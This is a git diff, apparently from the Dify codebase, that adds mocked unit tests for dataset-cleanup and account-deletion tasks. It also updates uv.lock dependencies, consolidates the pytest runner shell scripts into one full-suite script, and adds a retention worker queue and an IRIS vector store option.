has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). + + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/uv.lock b/api/uv.lock index 44703a0247..8d0dffbd8f 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -291,6 +291,22 @@ dependencies = [ ] sdist = { url = "https://files.pythonhosted.org/packages/32/eb/5e82e419c3061823f3feae9b5681588762929dc4da0176667297c2784c1a/alibabacloud_tea_xml-0.0.3.tar.gz", hash = "sha256:979cb51fadf43de77f41c69fc69c12529728919f849723eb0cd24eb7b048a90c", size = 3466, upload-time = "2025-07-01T08:04:55.144Z" } +[[package]] +name = "aliyun-log-python-sdk" +version = "0.9.37" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "dateparser" }, + { name = "elasticsearch" }, + { name = "jmespath" }, + { name = "lz4" }, + { name = "protobuf" }, + { name = "python-dateutil" }, + { name = "requests" }, + { name = "six" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/90/70/291d494619bb7b0cbcc00689ad995945737c2c9e0bff2733e0aa7dbaee14/aliyun_log_python_sdk-0.9.37.tar.gz", hash = "sha256:ea65c9cca3a7377cef87d568e897820338328a53a7acb1b02f1383910e103f68", size = 152549, upload-time = "2025-11-27T07:56:06.098Z" } + [[package]] name = "aliyun-python-sdk-core" version = "2.16.0" @@ -1293,6 +1309,21 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/c3/be/d0d44e092656fe7a06b55e6103cbce807cdbdee17884a5367c68c9860853/dataclasses_json-0.6.7-py3-none-any.whl", hash = "sha256:0dbf33f26c8d5305befd61b39d2b3414e8a407bedc2834dea9b8d642666fb40a", size = 28686, upload-time = "2024-06-09T16:20:16.715Z" }, ] +[[package]] +name = "dateparser" +version = "1.2.2" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "python-dateutil" }, + { name = "pytz" }, + { name = "regex" }, + { name = "tzlocal" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/a9/30/064144f0df1749e7bb5faaa7f52b007d7c2d08ec08fed8411aba87207f68/dateparser-1.2.2.tar.gz", hash = "sha256:986316f17cb8cdc23ea8ce563027c5ef12fc725b6fb1d137c14ca08777c5ecf7", size = 329840, upload-time = "2025-06-26T09:29:23.211Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/87/22/f020c047ae1346613db9322638186468238bcfa8849b4668a22b97faad65/dateparser-1.2.2-py3-none-any.whl", hash = "sha256:5a5d7211a09013499867547023a2a0c91d5a27d15dd4dbcea676ea9fe66f2482", size = 315453, upload-time = "2025-06-26T09:29:21.412Z" }, +] + [[package]] name = "decorator" version = "5.2.1" @@ -1337,9 +1368,10 @@ wheels = [ [[package]] name = "dify-api" -version = "1.11.0" +version = "1.11.1" source = { virtual = "." } dependencies = [ + { name = "aliyun-log-python-sdk" }, { name = "apscheduler" }, { name = "arize-phoenix-otel" }, { name = "azure-identity" }, @@ -1515,6 +1547,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1536,6 +1569,7 @@ vdb = [ [package.metadata] requires-dist = [ + { name = "aliyun-log-python-sdk", specifier = "~=0.9.37" }, { name = "apscheduler", specifier = ">=3.11.0" }, { name = "arize-phoenix-otel", specifier = "~=0.9.2" }, { name = "azure-identity", specifier = "==1.16.1" }, @@ -1711,6 +1745,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2918,6 +2953,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" @@ -6802,11 +6849,11 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.0" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/1c/43/554c2569b62f49350597348fc3ac70f786e3c32e7f19d266e19817812dd3/urllib3-2.6.0.tar.gz", hash = "sha256:cb9bcef5a4b345d5da5d145dc3e30834f58e8018828cbc724d30b4cb7d4d49f1", size = 432585, upload-time = "2025-12-05T15:08:47.885Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/56/1a/9ffe814d317c5224166b23e7c47f606d6e473712a2fad0f704ea9b99f246/urllib3-2.6.0-py3-none-any.whl", hash = "sha256:c90f7a39f716c572c4e3e58509581ebd83f9b59cced005b7db7ad2d22b0db99f", size = 131083, upload-time = "2025-12-05T15:08:45.983Z" }, ] [[package]] @@ -6900,7 +6947,7 @@ wheels = [ [[package]] name = "wandb" -version = "0.23.0" +version = "0.23.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "click" }, @@ -6914,17 +6961,17 @@ dependencies = [ { name = "sentry-sdk" }, { name = "typing-extensions" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/ef/8b/db2d44395c967cd452517311fd6ede5d1e07310769f448358d4874248512/wandb-0.23.0.tar.gz", hash = "sha256:e5f98c61a8acc3ee84583ca78057f64344162ce026b9f71cb06eea44aec27c93", size = 44413921, upload-time = "2025-11-11T21:06:30.737Z" } +sdist = { url = "https://files.pythonhosted.org/packages/0a/cc/770ae3aa7ae44f6792f7ecb81c14c0e38b672deb35235719bb1006519487/wandb-0.23.1.tar.gz", hash = "sha256:f6fb1e3717949b29675a69359de0eeb01e67d3360d581947d5b3f98c273567d6", size = 44298053, upload-time = "2025-12-03T02:25:10.79Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/41/61/a3220c7fa4cadfb2b2a5c09e3fa401787326584ade86d7c1f58bf1cd43bd/wandb-0.23.0-py3-none-macosx_12_0_arm64.whl", hash = "sha256:b682ec5e38fc97bd2e868ac7615a0ab4fc6a15220ee1159e87270a5ebb7a816d", size = 18992250, upload-time = "2025-11-11T21:06:03.412Z" }, - { url = "https://files.pythonhosted.org/packages/90/16/e69333cf3d11e7847f424afc6c8ae325e1f6061b2e5118d7a17f41b6525d/wandb-0.23.0-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:ec094eb71b778e77db8c188da19e52c4f96cb9d5b4421d7dc05028afc66fd7e7", size = 20045616, upload-time = "2025-11-11T21:06:07.109Z" }, - { url = "https://files.pythonhosted.org/packages/62/79/42dc6c7bb0b425775fe77f1a3f1a22d75d392841a06b43e150a3a7f2553a/wandb-0.23.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e43f1f04b98c34f407dcd2744cec0a590abce39bed14a61358287f817514a7b", size = 18758848, upload-time = "2025-11-11T21:06:09.832Z" }, - { url = "https://files.pythonhosted.org/packages/b8/94/d6ddb78334996ccfc1179444bfcfc0f37ffd07ee79bb98940466da6f68f8/wandb-0.23.0-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e5847f98cbb3175caf5291932374410141f5bb3b7c25f9c5e562c1988ce0bf5", size = 20231493, upload-time = "2025-11-11T21:06:12.323Z" }, - { url = "https://files.pythonhosted.org/packages/52/4d/0ad6df0e750c19dabd24d2cecad0938964f69a072f05fbdab7281bec2b64/wandb-0.23.0-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:6151355fd922539926e870be811474238c9614b96541773b990f1ce53368aef6", size = 18793473, upload-time = "2025-11-11T21:06:14.967Z" }, - { url = "https://files.pythonhosted.org/packages/f8/da/c2ba49c5573dff93dafc0acce691bb1c3d57361bf834b2f2c58e6193439b/wandb-0.23.0-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:df62e426e448ebc44269140deb7240df474e743b12d4b1f53b753afde4aa06d4", size = 20332882, upload-time = "2025-11-11T21:06:17.865Z" }, - { url = "https://files.pythonhosted.org/packages/40/65/21bfb10ee5cd93fbcaf794958863c7e05bac4bbeb1cc1b652094aa3743a5/wandb-0.23.0-py3-none-win32.whl", hash = "sha256:6c21d3eadda17aef7df6febdffdddfb0b4835c7754435fc4fe27631724269f5c", size = 19433198, upload-time = "2025-11-11T21:06:21.913Z" }, - { url = "https://files.pythonhosted.org/packages/f1/33/cbe79e66c171204e32cf940c7fdfb8b5f7d2af7a00f301c632f3a38aa84b/wandb-0.23.0-py3-none-win_amd64.whl", hash = "sha256:b50635fa0e16e528bde25715bf446e9153368428634ca7a5dbd7a22c8ae4e915", size = 19433201, upload-time = "2025-11-11T21:06:24.607Z" }, - { url = "https://files.pythonhosted.org/packages/1c/a0/5ecfae12d78ea036a746c071e4c13b54b28d641efbba61d2947c73b3e6f9/wandb-0.23.0-py3-none-win_arm64.whl", hash = "sha256:fa0181b02ce4d1993588f4a728d8b73ae487eb3cb341e6ce01c156be7a98ec72", size = 17678649, upload-time = "2025-11-11T21:06:27.289Z" }, + { url = "https://files.pythonhosted.org/packages/12/0b/c3d7053dfd93fd259a63c7818d9c4ac2ba0642ff8dc8db98662ea0cf9cc0/wandb-0.23.1-py3-none-macosx_12_0_arm64.whl", hash = "sha256:358e15471d19b7d73fc464e37371c19d44d39e433252ac24df107aff993a286b", size = 21527293, upload-time = "2025-12-03T02:24:48.011Z" }, + { url = "https://files.pythonhosted.org/packages/ee/9f/059420fa0cb6c511dc5c5a50184122b6aca7b178cb2aa210139e354020da/wandb-0.23.1-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:110304407f4b38f163bdd50ed5c5225365e4df3092f13089c30171a75257b575", size = 22745926, upload-time = "2025-12-03T02:24:50.519Z" }, + { url = "https://files.pythonhosted.org/packages/96/b6/fd465827c14c64d056d30b4c9fcf4dac889a6969dba64489a88fc4ffa333/wandb-0.23.1-py3-none-manylinux_2_28_aarch64.whl", hash = "sha256:6cc984cf85feb2f8ee0451d76bc9fb7f39da94956bb8183e30d26284cf203b65", size = 21212973, upload-time = "2025-12-03T02:24:52.828Z" }, + { url = "https://files.pythonhosted.org/packages/5c/ee/9a8bb9a39cc1f09c3060456cc79565110226dc4099a719af5c63432da21d/wandb-0.23.1-py3-none-manylinux_2_28_x86_64.whl", hash = "sha256:67431cd3168d79fdb803e503bd669c577872ffd5dadfa86de733b3274b93088e", size = 22887885, upload-time = "2025-12-03T02:24:55.281Z" }, + { url = "https://files.pythonhosted.org/packages/6d/4d/8d9e75add529142e037b05819cb3ab1005679272950128d69d218b7e5b2e/wandb-0.23.1-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:07be70c0baa97ea25fadc4a9d0097f7371eef6dcacc5ceb525c82491a31e9244", size = 21250967, upload-time = "2025-12-03T02:24:57.603Z" }, + { url = "https://files.pythonhosted.org/packages/97/72/0b35cddc4e4168f03c759b96d9f671ad18aec8bdfdd84adfea7ecb3f5701/wandb-0.23.1-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:216c95b08e0a2ec6a6008373b056d597573d565e30b43a7a93c35a171485ee26", size = 22988382, upload-time = "2025-12-03T02:25:00.518Z" }, + { url = "https://files.pythonhosted.org/packages/c0/6d/e78093d49d68afb26f5261a70fc7877c34c114af5c2ee0ab3b1af85f5e76/wandb-0.23.1-py3-none-win32.whl", hash = "sha256:fb5cf0f85692f758a5c36ab65fea96a1284126de64e836610f92ddbb26df5ded", size = 22150756, upload-time = "2025-12-03T02:25:02.734Z" }, + { url = "https://files.pythonhosted.org/packages/05/27/4f13454b44c9eceaac3d6e4e4efa2230b6712d613ff9bf7df010eef4fd18/wandb-0.23.1-py3-none-win_amd64.whl", hash = "sha256:21c8c56e436eb707b7d54f705652e030d48e5cfcba24cf953823eb652e30e714", size = 22150760, upload-time = "2025-12-03T02:25:05.106Z" }, + { url = "https://files.pythonhosted.org/packages/30/20/6c091d451e2a07689bfbfaeb7592d488011420e721de170884fedd68c644/wandb-0.23.1-py3-none-win_arm64.whl", hash = "sha256:8aee7f3bb573f2c0acf860f497ca9c684f9b35f2ca51011ba65af3d4592b77c1", size = 20137463, upload-time = "2025-12-03T02:25:08.317Z" }, ] [[package]] diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." + +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/dev/start-worker b/dev/start-worker index a01da11d86..7876620188 100755 --- a/dev/start-worker +++ b/dev/start-worker @@ -37,6 +37,7 @@ show_help() { echo " pipeline - Standard pipeline tasks" echo " triggered_workflow_dispatcher - Trigger dispatcher tasks" echo " trigger_refresh_executor - Trigger refresh tasks" + echo " retention - Retention tasks" } # Parse command line arguments @@ -105,10 +106,10 @@ if [[ -z "${QUEUES}" ]]; then # Configure queues based on edition if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset and workflow have separate queues - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi echo "No queues specified, using edition-based defaults: ${QUEUES}" diff --git a/docker/.env.example b/docker/.env.example index 04088b72a8..e5cdb64dae 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database 